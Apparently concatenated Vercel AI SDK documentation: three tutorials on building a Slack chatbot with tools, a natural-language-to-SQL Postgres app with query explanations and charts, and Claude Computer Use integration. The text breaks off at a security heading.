thread_ts: thread_ts,
text: "Hello, I'm an AI assistant built with the AI SDK by Vercel!",
});
await client.assistant.threads.setSuggestedPrompts({
channel_id: channel_id,
thread_ts: thread_ts,
prompts: [
{
title: 'Get the weather',
message: 'What is the current weather in London?',
},
{
title: 'Get the news',
message: 'What is the latest Premier League news from the BBC?',
},
],
});
}
Direct Messages
For direct messages to your bot, the message event is triggered and the event is handled by the handleNewAssistantMessage function in handle-messages.ts:
- Verifies the message isn't from a bot
- Updates the status to show the response is being generated
- Retrieves the conversation history
- Calls the LLM with the conversation context
- Posts the LLM's response to the thread
Here's the code for the handleNewAssistantMessage function:
import type { GenericMessageEvent } from '@slack/web-api';
import { client, getThread, updateStatusUtil } from './slack-utils';
import { generateResponse } from './ai';
export async function handleNewAssistantMessage(
event: GenericMessageEvent,
botUserId: string,
) {
if (
event.bot_id ||
event.bot_id === botUserId ||
event.bot_profile ||
!event.thread_ts
)
return;
const { thread_ts, channel } = event;
const updateStatus = updateStatusUtil(channel, thread_ts);
updateStatus('is thinking...');
const messages = await getThread(channel, thread_ts, botUserId);
const result = await generateResponse(messages, updateStatus);
await client.chat.postMessage({
channel: channel,
thread_ts: thread_ts,
text: result,
unfurl_links: false,
blocks: [
{
type: 'section',
text: {
type: 'mrkdwn',
text: result,
},
},
],
});
updateStatus('');
}
With the event handlers in place, let's now implement the AI logic.
Implementing AI Logic
The core of our application is the generateResponse function in lib/generate-response.ts, which processes messages and generates responses using the AI SDK.
Here's how to implement it:
import { generateText, ModelMessage } from 'ai';
__PROVIDER_IMPORT__;
export const generateResponse = async (
messages: ModelMessage[],
updateStatus?: (status: string) => void,
) => {
const { text } = await generateText({
model: __MODEL__,
system: `You are a Slack bot assistant. Keep your responses concise and to the point.
- Do not tag users.
- Current date is: ${new Date().toISOString().split('T')[0]}`,
messages,
});
// Convert markdown to Slack mrkdwn format
return text.replace(/\[(.*?)\]\((.*?)\)/g, '<$2|$1>').replace(/\*\*/g, '*');
};
This basic implementation:
- Uses the AI SDK's
generateTextfunction to call Anthropic'sclaude-sonnet-4.5model - Provides a system prompt to guide the model's behavior
- Formats the response for Slack's markdown format
Enhancing with Tools
The real power of the AI SDK comes from tools that enable your bot to perform actions. Let's add two useful tools:
import { generateText, tool, ModelMessage, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
import { exa } from './utils';
export const generateResponse = async (
messages: ModelMessage[],
updateStatus?: (status: string) => void,
) => {
const { text } = await generateText({
model: __MODEL__,
system: `You are a Slack bot assistant. Keep your responses concise and to the point.
- Do not tag users.
- Current date is: ${new Date().toISOString().split('T')[0]}
- Always include sources in your final response if you use web search.`,
messages,
stopWhen: stepCountIs(10),
tools: {
getWeather: tool({
description: 'Get the current weather at a location',
inputSchema: z.object({
latitude: z.number(),
longitude: z.number(),
city: z.string(),
}),
execute: async ({ latitude, longitude, city }) => {
updateStatus?.(`is getting weather for ${city}...`);
const response = await fetch(
`https://api.open-meteo.com/v1/forecast?latitude=${latitude}&longitude=${longitude}&current=temperature_2m,weathercode,relativehumidity_2m&timezone=auto`,
);
const weatherData = await response.json();
return {
temperature: weatherData.current.temperature_2m,
weatherCode: weatherData.current.weathercode,
humidity: weatherData.current.relativehumidity_2m,
city,
};
},
}),
searchWeb: tool({
description: 'Use this to search the web for information',
inputSchema: z.object({
query: z.string(),
specificDomain: z
.string()
.nullable()
.describe(
'a domain to search if the user specifies e.g. bbc.com. Should be only the domain name without the protocol',
),
}),
execute: async ({ query, specificDomain }) => {
updateStatus?.(`is searching the web for ${query}...`);
const { results } = await exa.searchAndContents(query, {
livecrawl: 'always',
numResults: 3,
includeDomains: specificDomain ? [specificDomain] : undefined,
});
return {
results: results.map(result => ({
title: result.title,
url: result.url,
snippet: result.text.slice(0, 1000),
})),
};
},
}),
},
});
// Convert markdown to Slack mrkdwn format
return text.replace(/\[(.*?)\]\((.*?)\)/g, '<$2|$1>').replace(/\*\*/g, '*');
};
In this updated implementation:
- You added two tools:
  - getWeather: fetches weather data for a specified location
  - searchWeb: searches the web for information using the Exa API
- You set stopWhen: stepCountIs(10) to enable multi-step conversations. This defines the stopping conditions of your agent when the model generates a tool call. The AI SDK will automatically send any tool results back to the LLM to trigger additional tool calls or responses as the LLM deems necessary. This turns your LLM call from a one-off operation into a multi-step agentic flow.
How It Works
When a user interacts with your bot:
- The Slack event is received and processed by your API endpoint
- The user's message and the thread history are passed to the generateResponse function
- The AI SDK processes the message and may invoke tools as needed
- The response is formatted for Slack and sent back to the user
The tools are automatically invoked based on the user's intent. For example, if a user asks "What's the weather in London?", the AI will:
- Recognize this as a weather query
- Call the getWeather tool with London's coordinates (inferred by the LLM)
- Process the weather data
- Generate a final response, answering the user's question
Deploying the App
- Install the Vercel CLI
<Snippet text={['pnpm install -g vercel']} />
- Deploy the app
<Snippet text={['vercel deploy']} />
- Copy the deployment URL and update the Slack app's Event Subscriptions to point to your Vercel URL
- Go to your project's deployment settings (Your project -> Settings -> Environment Variables) and add your environment variables
SLACK_BOT_TOKEN=your_slack_bot_token
SLACK_SIGNING_SECRET=your_slack_signing_secret
OPENAI_API_KEY=your_openai_api_key
EXA_API_KEY=your_exa_api_key
- Head back to https://api.slack.com/ and navigate to the "Event Subscriptions" page. Enable events and add your deployment URL.
https://your-vercel-url.vercel.app/api/events
- On the Events Subscription page, subscribe to the following events.
  - app_mention
  - assistant_thread_started
  - message:im
Finally, head to Slack and test the app by sending a message to the bot.
Next Steps
You've built a Slack chatbot powered by the AI SDK! Here are some ways you could extend it:
- Add memory for specific users to give the LLM context of previous interactions
- Implement more tools like database queries or knowledge base searches
- Add support for rich message formatting with blocks
- Add analytics to track usage patterns
---
title: Natural Language Postgres
description: Learn how to build a Next.js app that lets you talk to a PostgreSQL database in natural language.
tags: ['agents', 'next', 'tools']
---
Natural Language Postgres Guide
In this guide, you will learn how to build an app that uses AI to interact with a PostgreSQL database using natural language.
The application will:
- Generate SQL queries from a natural language input
- Explain query components in plain English
- Create a chart to visualize query results
You can find a completed version of this project at natural-language-postgres.vercel.app.
Project setup
This project uses the following stack:
- Next.js (App Router)
- AI SDK
- OpenAI
- Zod
- Postgres with Vercel Postgres
- shadcn-ui and TailwindCSS for styling
- Recharts for data visualization
Clone repo
To focus on the AI-powered functionality rather than project setup and configuration we've prepared a starter repository which includes a database schema and a few components.
Clone the starter repository and check out the starter branch:
<Snippet text={[ 'git clone https://github.com/vercel-labs/natural-language-postgres', 'cd natural-language-postgres', 'git checkout starter', ]} />
Project setup and data
Let's set up the project and seed the database with the dataset:
- Install dependencies:
<Snippet text={['pnpm install']} />
- Copy the example environment variables file:
<Snippet text={['cp .env.example .env']} />
- Add your environment variables to .env:
OPENAI_API_KEY="your_api_key_here"
POSTGRES_URL="..."
POSTGRES_PRISMA_URL="..."
POSTGRES_URL_NO_SSL="..."
POSTGRES_URL_NON_POOLING="..."
POSTGRES_USER="..."
POSTGRES_HOST="..."
POSTGRES_PASSWORD="..."
POSTGRES_DATABASE="..."
- This project uses CB Insights' Unicorn Companies dataset. You can download the dataset by following these instructions:
- Navigate to CB Insights Unicorn Companies
- Enter in your email. You will receive a link to download the dataset.
- Save it as unicorns.csv in your project root
Setting up Postgres with Vercel
To set up a Postgres instance on your Vercel account:
- Go to Vercel.com and make sure you're logged in
- Navigate to your team homepage
- Click on the Integrations tab
- Click Browse Marketplace
- Look for the Storage option in the sidebar
- Select the Neon option (recommended, but any other PostgreSQL database provider should work)
- Click Install, then click Install again in the top right corner
- On the "Get Started with Neon" page, click Create Database on the right
- Select your region (e.g., Washington, D.C., U.S. East)
- Turn off Auth
- Click Continue
- Name your database (you can use the default name or rename it to something like "NaturalLanguagePostgres")
- Click Create in the bottom right corner
- After seeing "Database created successfully", click Done
- You'll be redirected to your database instance
- In the Quick Start section, click Show secrets
- Copy the full DATABASE_URL environment variable and use it to populate the Postgres environment variables in your .env file
About the dataset
The Unicorn List dataset contains the following information about unicorn startups (companies with a valuation above $1bn):
- Company name
- Valuation
- Date joined (unicorn status)
- Country
- City
- Industry
- Select investors
This dataset contains over 1000 rows across 7 columns, giving us plenty of structured data to analyze. This makes it perfect for exploring various SQL queries that can reveal interesting insights about the unicorn startup ecosystem.
- Now that you have the dataset downloaded and added to your project, you can initialize the database with the following command:
<Snippet text={['pnpm run seed']} />
Note: this step can take a little while. You should see a message indicating the Unicorns table has been created and then that the database has been seeded successfully.
- Start the development server:
<Snippet text={['pnpm run dev']} />
Your application should now be running at http://localhost:3000.
Project structure
The starter repository already includes everything that you will need, including:
- Database seed script (lib/seed.ts)
- Basic components built with shadcn/ui (components/)
- Function to run SQL queries (app/actions.ts)
- Type definitions for the database schema (lib/types.ts)
Existing components
The application contains a single page in app/page.tsx that serves as the main interface.
At the top, you'll find a header (header.tsx) displaying the application title and description. Below that is an input field and search button (search.tsx) where you can enter natural language queries.
Initially, the page shows a collection of suggested example queries (suggested-queries.tsx) that you can click to quickly try out the functionality.
When you submit a query:
- The suggested queries section disappears and a loading state appears
- Once complete, a card appears with "TODO - IMPLEMENT ABOVE" (query-viewer.tsx) which will eventually show your generated SQL
- Below that is an empty results area with "No results found" (results.tsx)
After you implement the core functionality:
- The results section will display data in a table format
- A toggle button will allow switching between table and chart views
- The chart view will visualize your query results
Let's implement the AI-powered functionality to bring it all together.
Building the application
As a reminder, this application will have three main features:
- Generate SQL queries from natural language
- Create a chart from the query results
- Explain SQL queries in plain English
For each of these features, you'll use the AI SDK via Server Actions to interact with OpenAI's GPT-4o and GPT-4o-mini models. Server Actions are a powerful React Server Component feature that allows you to call server-side functions directly from your frontend code.
Let's start with generating a SQL query from natural language.
Generate SQL queries
Providing context
For the model to generate accurate SQL queries, it needs context about your database schema, tables, and relationships. You will communicate this information through a prompt that should include:
- Schema information
- Example data formats
- Available SQL operations
- Best practices for query structure
- Nuanced advice for specific fields
Let's write a prompt that includes all of this information:
You are a SQL (postgres) and data visualization expert. Your job is to help the user write a SQL query to retrieve the data they need. The table schema is as follows:
unicorns (
id SERIAL PRIMARY KEY,
company VARCHAR(255) NOT NULL UNIQUE,
valuation DECIMAL(10, 2) NOT NULL,
date_joined DATE,
country VARCHAR(255) NOT NULL,
city VARCHAR(255) NOT NULL,
industry VARCHAR(255) NOT NULL,
select_investors TEXT NOT NULL
);
Only retrieval queries are allowed.
For things like industry, company names and other string fields, use the ILIKE operator and convert both the search term and the field to lowercase using LOWER() function. For example: LOWER(industry) ILIKE LOWER('%search_term%').
Note: select_investors is a comma-separated list of investors. Trim whitespace to ensure you're grouping properly. Note, some fields may be null or have only one value.
When answering questions about a specific field, ensure you are selecting the identifying column (i.e. 'what is Vercel's valuation' would select company and valuation).
The industries available are:
- healthcare & life sciences
- consumer & retail
- financial services
- enterprise tech
- insurance
- media & entertainment
- industrials
- health
If the user asks for a category that is not in the list, infer based on the list above.
Note: valuation is in billions of dollars so 10b would be 10.0.
Note: if the user asks for a rate, return it as a decimal. For example, 0.1 would be 10%.
If the user asks for 'over time' data, return by year.
When searching for UK or USA, write out United Kingdom or United States respectively.
EVERY QUERY SHOULD RETURN QUANTITATIVE DATA THAT CAN BE PLOTTED ON A CHART! There should always be at least two columns. If the user asks for a single column, return the column and the count of the column. If the user asks for a rate, return the rate as a decimal. For example, 0.1 would be 10%.
There are several important elements of this prompt:
- Schema description helps the model understand exactly what data fields to work with
- Includes rules for handling queries based on common SQL patterns - for example, always using ILIKE for case-insensitive string matching
- Explains how to handle edge cases in the dataset, like dealing with the comma-separated investors field and ensuring whitespace is properly handled
- Instead of having the model guess at industry categories, it provides the exact list that exists in the data, helping avoid mismatches
- The prompt helps standardize data transformations - like knowing to interpret "10b" as "10.0" billion dollars, or that rates should be decimal values
- Clear rules ensure the query output will be chart-friendly by always including at least two columns of data that can be plotted
This prompt structure provides a strong foundation for query generation, but you should experiment and iterate based on your specific needs and the model you're using.
Create a Server Action
With the prompt done, let's create a Server Action.
Open app/actions.ts. You should see one action already defined (runGeneratedSQLQuery).
Add a new action. This action should be asynchronous and take in one parameter - the natural language query.
/* ...rest of the file... */
export const generateQuery = async (input: string) => {};
In this action, you'll use the generateObject function from the AI SDK which allows you to constrain the model's output to a pre-defined schema. This process, sometimes called structured output, ensures the model returns only the SQL query without any additional prefixes, explanations, or formatting that would require manual parsing.
/* ...other imports... */
import { generateObject } from 'ai';
import { z } from 'zod';
/* ...rest of the file... */
export const generateQuery = async (input: string) => {
'use server';
try {
const result = await generateObject({
model: 'openai/gpt-4o',
system: `You are a SQL (postgres) ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
prompt: `Generate the query necessary to retrieve the data the user wants: ${input}`,
schema: z.object({
query: z.string(),
}),
});
return result.object.query;
} catch (e) {
console.error(e);
throw new Error('Failed to generate query');
}
};
Note that you are constraining the output to a single string field called query using zod, a TypeScript schema validation library. This ensures the model returns only the SQL query itself, which is then returned from the action.
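You can sanity-check the action in isolation before wiring up the UI. For example (the input and generated SQL below are illustrative):
const sql = await generateQuery('how many unicorns are from San Francisco?');
console.log(sql);
// e.g. SELECT city, COUNT(*) AS count FROM unicorns WHERE LOWER(city) ILIKE LOWER('%san francisco%') GROUP BY city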
Update the frontend
With the Server Action in place, you can now update the frontend to call this action when the user submits a natural language query. In the root page (app/page.tsx), you should see a handleSubmit function that is called when the user submits a query.
Import the generateQuery function and call it with the user's input.
/* ...other imports... */
import { runGeneratedSQLQuery, generateQuery } from './actions';
/* ...rest of the file... */
const handleSubmit = async (suggestion?: string) => {
clearExistingData();
const question = suggestion ?? inputValue;
if (inputValue.length === 0 && !suggestion) return;
if (question.trim()) {
setSubmitted(true);
}
setLoading(true);
setLoadingStep(1);
setActiveQuery('');
try {
const query = await generateQuery(question);
if (query === undefined) {
toast.error('An error occurred. Please try again.');
setLoading(false);
return;
}
setActiveQuery(query);
setLoadingStep(2);
const companies = await runGeneratedSQLQuery(query);
const columns = companies.length > 0 ? Object.keys(companies[0]) : [];
setResults(companies);
setColumns(columns);
setLoading(false);
} catch (e) {
toast.error('An error occurred. Please try again.');
setLoading(false);
}
};
/* ...rest of the file... */
Now, when the user submits a natural language query (e.g. "how many unicorns are from San Francisco?"), that question will be sent to your newly created Server Action. The Server Action will call the model, passing in your system prompt and the user's query, and return the generated SQL query in a structured format. This query is then passed to the runGeneratedSQLQuery action to run against your database. The results are then saved in local state and displayed to the user.
Save the file, make sure the dev server is running, and then head to localhost:3000 in your browser. Try submitting a natural language query and see the generated SQL query and results. You should see a SQL query generated and displayed under the input field. You should also see the results of the query displayed in a table below the input field.
Try clicking the SQL query to see the full query if it's too long to display in the input field. You should see a button on the right side of the input field with a question mark icon. Clicking this button currently does nothing, but you'll add the "explain query" functionality to it in the next step.
Explain SQL Queries
Next, let's add the ability to explain SQL queries in plain English. This feature helps users understand how the generated SQL query works by breaking it down into logical sections. As with the SQL query generation, you'll need a prompt to guide the model when explaining queries.
Let's craft a prompt for the explain query functionality:
You are a SQL (postgres) expert. Your job is to explain to the user the SQL query you wrote to retrieve the data they asked for. The table schema is as follows:
unicorns (
id SERIAL PRIMARY KEY,
company VARCHAR(255) NOT NULL UNIQUE,
valuation DECIMAL(10, 2) NOT NULL,
date_joined DATE,
country VARCHAR(255) NOT NULL,
city VARCHAR(255) NOT NULL,
industry VARCHAR(255) NOT NULL,
select_investors TEXT NOT NULL
);
When you explain you must take a section of the query, and then explain it. Each "section" should be unique. So in a query like: "SELECT * FROM unicorns limit 20", the sections could be "SELECT *", "FROM UNICORNS", "LIMIT 20".
If a section doesn't have any explanation, include it, but leave the explanation empty.
Like the prompt for generating SQL queries, you provide the model with the schema of the database. Additionally, you provide an example of what each section of the query might look like. This helps the model understand the structure of the query and how to break it down into logical sections.
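To make the expected output shape concrete, here is an illustrative breakdown the model might produce for SELECT * FROM unicorns LIMIT 20 (the values are hypothetical):
const exampleExplanations = [
  { section: 'SELECT *', explanation: 'Select every column from the matching rows.' },
  { section: 'FROM unicorns', explanation: 'Read rows from the unicorns table.' },
  { section: 'LIMIT 20', explanation: 'Return at most 20 rows.' },
];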
Create a Server Action
Add a new Server Action to generate explanations for SQL queries.
This action takes two parameters - the original natural language input and the generated SQL query.
/* ...rest of the file... */
export const explainQuery = async (input: string, sqlQuery: string) => {
'use server';
try {
const result = await generateObject({
model: 'openai/gpt-4o',
system: `You are a SQL (postgres) expert. ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
prompt: `Explain the SQL query you generated to retrieve the data the user wanted. Assume the user is not an expert in SQL. Break down the query into steps. Be concise.
User Query:
${input}
Generated SQL Query:
${sqlQuery}`,
});
return result.object;
} catch (e) {
console.error(e);
throw new Error('Failed to generate query');
}
};
This action uses the generateObject function again. However, you haven't defined the schema yet. Let's define it in another file so it can also be used as a type in your components.
Update your lib/types.ts file to include the schema for the explanations:
import { z } from 'zod';
/* ...rest of the file... */
export const explanationSchema = z.object({
section: z.string(),
explanation: z.string(),
});
export type QueryExplanation = z.infer<typeof explanationSchema>;
This schema defines the structure of the explanation that the model will generate. Each explanation will have a section and an explanation. The section is the part of the query being explained, and the explanation is the plain English explanation of that section. Go back to your actions.ts file and import and use the explanationSchema:
// other imports
import { explanationSchema } from '@/lib/types';
/* ...rest of the file... */
export const explainQuery = async (input: string, sqlQuery: string) => {
'use server';
try {
const result = await generateObject({
model: 'openai/gpt-4o',
system: `You are a SQL (postgres) expert. ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
prompt: `Explain the SQL query you generated to retrieve the data the user wanted. Assume the user is not an expert in SQL. Break down the query into steps. Be concise.
User Query:
${input}
Generated SQL Query:
${sqlQuery}`,
schema: explanationSchema,
output: 'array',
});
return result.object;
} catch (e) {
console.error(e);
throw new Error('Failed to generate query');
}
};
Update query viewer
Next, update the query-viewer.tsx component to display these explanations. The handleExplainQuery function is called every time the user clicks the question icon button on the right side of the query. Let's update this function to use the new explainQuery action:
/* ...other imports... */
import { explainQuery } from '@/app/actions';
/* ...rest of the component... */
const handleExplainQuery = async () => {
setQueryExpanded(true);
setLoadingExplanation(true);
const explanations = await explainQuery(inputValue, activeQuery);
setQueryExplanations(explanations);
setLoadingExplanation(false);
};
/* ...rest of the component... */
Now when users click the explanation button (the question mark icon), the component will:
- Show a loading state
- Send the active SQL query and the user's natural language query to your Server Action
- The model will generate an array of explanations
- The explanations will be set in the component state and rendered in the UI
Submit a new query and then click the explanation button. Hover over different elements of the query. You should see the explanations for each section!
Visualizing query results
Finally, let's render the query results visually in a chart. There are two approaches you could take:
- Send both the query and data to the model and ask it to return the data in a visualization-ready format. While this provides complete control over the visualization, it requires the model to send back all of the data, which significantly increases latency and costs.
- Send the query and data to the model and ask it to generate a chart configuration (fixed-size and not many tokens) that maps your data appropriately. This configuration specifies how to visualize the information while delivering the insights from your natural language query. Importantly, this is done without requiring the model to return the full dataset.
Since you don't know the SQL query or data shape beforehand, let's use the second approach to dynamically generate chart configurations based on the query results and user intent.
Generate the chart configuration
For this feature, you'll create a Server Action that takes the query results and the user's original natural language query to determine the best visualization approach. Your application is already set up to use shadcn charts (which uses Recharts under the hood) so the model will need to generate:
- Chart type (bar, line, area, or pie)
- Axis mappings
- Visual styling
Let's start by defining the schema for the chart configuration in lib/types.ts:
/* ...rest of the file... */
export const configSchema = z
.object({
description: z
.string()
.describe(
'Describe the chart. What is it showing? What is interesting about the way the data is displayed?',
),
takeaway: z.string().describe('What is the main takeaway from the chart?'),
type: z.enum(['bar', 'line', 'area', 'pie']).describe('Type of chart'),
title: z.string(),
xKey: z.string().describe('Key for x-axis or category'),
yKeys: z
.array(z.string())
.describe(
'Key(s) for y-axis values; this is typically the quantitative column',
),
multipleLines: z
.boolean()
.describe(
'For line charts only: whether the chart is comparing groups of data.',
)
.optional(),
measurementColumn: z
.string()
.describe(
'For line charts only: key for quantitative y-axis column to measure against (eg. values, counts etc.)',
)
.optional(),
lineCategories: z
.array(z.string())
.describe(
'For line charts only: Categories used to compare different lines or data series. Each category represents a distinct line in the chart.',
)
.optional(),
colors: z
.record(
z.string().describe('Any of the yKeys'),
z.string().describe('Color value in CSS format (e.g., hex, rgb, hsl)'),
)
.describe('Mapping of data keys to color values for chart elements')
.optional(),
legend: z.boolean().describe('Whether to show legend'),
})
.describe('Chart configuration object');
export type Config = z.infer<typeof configSchema>;
This schema makes extensive use of Zod's .describe() function to give the model extra context about each of the keys you are expecting in the chart configuration. This will help the model understand the purpose of each key and generate more accurate results.
Another important technique to note here is that you are defining description and takeaway fields. Not only are these useful for the user to quickly understand what the chart means and what they should take away from it, but they also force the model to generate a description of the data first, before it attempts to generate configuration attributes like axis and columns. This will help the model generate more accurate and relevant chart configurations.
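As an illustration, a question like "how many unicorns are in each industry?" might yield a configuration along these lines (the values are hypothetical):
const exampleConfig: Config = {
  description: 'Bar chart showing the number of unicorn companies in each industry.',
  takeaway: 'Enterprise tech has the largest number of unicorns.',
  type: 'bar',
  title: 'Unicorns by Industry',
  xKey: 'industry',
  yKeys: ['count'],
  colors: { count: 'hsl(var(--chart-1))' },
  legend: false,
};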
Create the Server Action
Create a new action in app/actions.ts:
/* ...other imports... */
import { Config, configSchema, explanationSchema, Result } from '@/lib/types';
/* ...rest of the file... */
export const generateChartConfig = async (
results: Result[],
userQuery: string,
) => {
'use server';
try {
const { object: config } = await generateObject({
model: 'openai/gpt-4o',
system: 'You are a data visualization expert.',
prompt: `Given the following data from a SQL query result, generate the chart config that best visualizes the data and answers the user's query.
For multiple groups use multi-lines.
Here is an example complete config:
export const chartConfig = {
type: "pie",
xKey: "month",
yKeys: ["sales", "profit", "expenses"],
colors: {
sales: "#4CAF50", // Green for sales
profit: "#2196F3", // Blue for profit
expenses: "#F44336" // Red for expenses
},
legend: true
}
User Query:
${userQuery}
Data:
${JSON.stringify(results, null, 2)}`,
schema: configSchema,
});
// Override with shadcn theme colors
const colors: Record<string, string> = {};
config.yKeys.forEach((key, index) => {
colors[key] = `hsl(var(--chart-${index + 1}))`;
});
const updatedConfig = { ...config, colors };
return { config: updatedConfig };
} catch (e) {
console.error(e);
throw new Error('Failed to generate chart suggestion');
}
};
Update the chart component
With the action in place, you'll want to trigger it automatically after receiving query results. This ensures the visualization appears almost immediately after data loads.
Update the handleSubmit function in your root page (app/page.tsx) to generate and set the chart configuration after running the query:
/* ...other imports... */
import { runGeneratedSQLQuery, generateQuery, generateChartConfig } from './actions';
/* ...rest of the file... */
const handleSubmit = async (suggestion?: string) => {
clearExistingData();
const question = suggestion ?? inputValue;
if (inputValue.length === 0 && !suggestion) return;
if (question.trim()) {
setSubmitted(true);
}
setLoading(true);
setLoadingStep(1);
setActiveQuery('');
try {
const query = await generateQuery(question);
if (query === undefined) {
toast.error('An error occurred. Please try again.');
setLoading(false);
return;
}
setActiveQuery(query);
setLoadingStep(2);
const companies = await runGeneratedSQLQuery(query);
const columns = companies.length > 0 ? Object.keys(companies[0]) : [];
setResults(companies);
setColumns(columns);
setLoading(false);
const { config } = await generateChartConfig(companies, question);
setChartConfig(config);
} catch (e) {
toast.error('An error occurred. Please try again.');
setLoading(false);
}
};
/* ...rest of the file... */
Now when users submit queries, the application will:
- Generate and run the SQL query
- Display the table results
- Generate a chart configuration for the results
- Allow toggling between table and chart views
Head back to the browser and test the application with a few queries. You should see the chart visualization appear after the table results.
Next steps
You've built an AI-powered SQL analysis tool that can convert natural language to SQL queries, visualize query results, and explain SQL queries in plain English.
You could, for example, extend the application to use your own data sources or add more advanced features like customizing the chart configuration schema to support more chart types and options. You could also add more complex SQL query generation capabilities.
title: Get started with Computer Use description: Get started with Claude's Computer Use capabilities with the AI SDK tags: ['computer-use', 'tools']
Get started with Computer Use
With the release of Computer Use in Claude 3.5 Sonnet, you can now direct AI models to interact with computers like humans do - moving cursors, clicking buttons, and typing text. This capability enables automation of complex tasks while leveraging Claude's advanced reasoning abilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Anthropic's Claude alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more. In this guide, you will learn how to integrate Computer Use into your AI SDK applications.
Computer Use
Anthropic recently released a new version of the Claude 3.5 Sonnet model which is capable of 'Computer Use'. This allows the model to interact with computer interfaces through basic actions like:
- Moving the cursor
- Clicking buttons
- Typing text
- Taking screenshots
- Reading screen content
How It Works
Computer Use enables the model to read and interact with on-screen content through a series of coordinated steps. Here's how the process works:
- Start with a prompt and tools: Add Anthropic-defined Computer Use tools to your request and provide a task (prompt) for the model. For example: "save an image to your downloads folder."
- Select the right tool: The model evaluates which computer tools can help accomplish the task. It then sends a formatted tool_call to use the appropriate tool.
- Execute the action and return results: The AI SDK processes Claude's request by running the selected tool. The results can then be sent back to Claude through a tool_result message.
- Complete the task through iterations: Claude analyzes each result to determine if more actions are needed. It continues requesting tool use and processing results until it completes your task or requires additional input.
Available Tools
There are three main tools available in the Computer Use API:
- Computer Tool: Enables basic computer control like mouse movement, clicking, and keyboard input
- Text Editor Tool: Provides functionality for viewing and editing text files
- Bash Tool: Allows execution of bash commands
Implementation Considerations
Computer Use tools in the AI SDK are predefined interfaces that require your own implementation of the execution layer. While the SDK provides the type definitions and structure for these tools, you need to:
- Set up a controlled environment for Computer Use execution
- Implement core functionality like mouse control and keyboard input
- Handle screenshot capture and processing
- Set up rules and limits for how Claude can interact with your system
The recommended approach is to start with Anthropic's reference implementation, which provides:
- A containerized environment configured for safe Computer Use
- Ready-to-use (Python) implementations of Computer Use tools
- An agent loop for API interaction and tool execution
- A web interface for monitoring and control
This reference implementation serves as a foundation to understand the requirements before building your own custom solution.
Getting Started with the AI SDK
First, ensure you have the AI SDK and Anthropic AI SDK provider installed:
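<Snippet text={['pnpm add ai @ai-sdk/anthropic']} />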
You can add Computer Use to your AI SDK applications using provider-defined client tools. These tools accept various input parameters (like display height and width in the case of the computer tool) and then require that you define an execute function.
Here's how you could set up the Computer Tool with the AI SDK:
import { anthropic } from '@ai-sdk/anthropic';
import { getScreenshot, executeComputerAction } from '@/utils/computer-use';
const computerTool = anthropic.tools.computer_20250124({
displayWidthPx: 1920,
displayHeightPx: 1080,
execute: async ({ action, coordinate, text }) => {
switch (action) {
case 'screenshot': {
return {
type: 'image',
data: getScreenshot(),
};
}
default: {
return executeComputerAction(action, coordinate, text);
}
}
},
toModelOutput(result) {
return typeof result === 'string'
? [{ type: 'text', text: result }]
: [{ type: 'image', data: result.data, mediaType: 'image/png' }];
},
});
The computerTool handles two main actions: taking screenshots via getScreenshot() and executing computer actions like mouse movements and clicks through executeComputerAction(). Remember, you have to implement this execution logic (e.g. the getScreenshot and executeComputerAction functions) to handle the actual computer interactions. The execute function should handle all low-level interactions with the operating system.
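As a rough sketch of what that execution layer might look like, the moveMouse, clickMouse, typeText, and captureScreen helpers below are hypothetical stand-ins for whatever OS automation layer you choose (ideally running inside a sandboxed VM or container):
// utils/computer-use.ts -- a minimal sketch, not a production implementation
import { moveMouse, clickMouse, typeText, captureScreen } from './automation'; // hypothetical helpers
export function getScreenshot(): string {
  // Return the current screen as a base64-encoded PNG
  return captureScreen().toString('base64');
}
export async function executeComputerAction(
  action: string,
  coordinate: number[] | undefined,
  text: string | undefined,
): Promise<string> {
  switch (action) {
    case 'mouse_move':
      await moveMouse(coordinate![0], coordinate![1]);
      return 'moved cursor';
    case 'left_click':
      await clickMouse('left');
      return 'clicked';
    case 'type':
      await typeText(text ?? '');
      return `typed: ${text}`;
    default:
      throw new Error(`Unsupported action: ${action}`);
  }
}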
Finally, to send tool results back to the model, use the toModelOutput() function to convert text and image responses into a format the model can process. The AI SDK includes experimental support for these multi-modal tool results when using Anthropic's models.
Using Computer Tools with Text Generation
Once your tool is defined, you can use it with both the generateText and streamText functions.
For one-shot text generation, use generateText:
const result = await generateText({
model: 'anthropic/claude-sonnet-4-20250514',
prompt: 'Move the cursor to the center of the screen and take a screenshot',
tools: { computer: computerTool },
});
console.log(result.text);
For streaming responses, use streamText to receive updates in real-time:
const result = streamText({
model: 'anthropic/claude-sonnet-4-20250514',
prompt: 'Open the browser and navigate to vercel.com',
tools: { computer: computerTool },
});
for await (const chunk of result.textStream) {
console.log(chunk);
}
Configure Multi-Step (Agentic) Generations
To allow the model to perform multiple steps without user intervention, use the stopWhen parameter. This will automatically send any tool results back to the model to trigger a subsequent generation:
import { stepCountIs } from 'ai';
const stream = streamText({
model: 'anthropic/claude-sonnet-4-20250514',
prompt: 'Open the browser and navigate to vercel.com',
tools: { computer: computerTool },
stopWhen: stepCountIs(10), // experiment with this value based on your use case
});
Combine Multiple Tools
You can combine multiple tools in a single request to enable more complex workflows. The AI SDK supports all three of Claude's Computer Use tools:
const computerTool = anthropic.tools.computer_20250124({
...
});
const bashTool = anthropic.tools.bash_20250124({
  // requires: import { execSync } from 'node:child_process';
  execute: async ({ command, restart }) => execSync(command).toString(),
});
const textEditorTool = anthropic.tools.textEditor_20250124({
  execute: async ({
    command,
    path,
    file_text,
    insert_line,
    new_str,
    old_str,
    view_range,
  }) => {
    // Delegate file operations to your own implementation based on the command
    return executeTextEditorFunction({
      command,
      path,
      fileText: file_text,
      insertLine: insert_line,
      newStr: new_str,
      oldStr: old_str,
      viewRange: view_range,
    });
  },
});
const response = await generateText({
model: 'anthropic/claude-sonnet-4-20250514',
prompt: "Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
tools: {
computer: computerTool,
bash: bashTool,
str_replace_editor: textEditorTool,
},
});
Best Practices for Computer Use
To get the best results when using Computer Use:
- Specify simple, well-defined tasks with explicit instructions for each step
- Prompt Claude to verify outcomes through screenshots
- Use keyboard shortcuts when UI elements are difficult to manipulate
- Include example screenshots for repeatable tasks
- Provide explicit tips in system prompts for known tasks
Security Measures
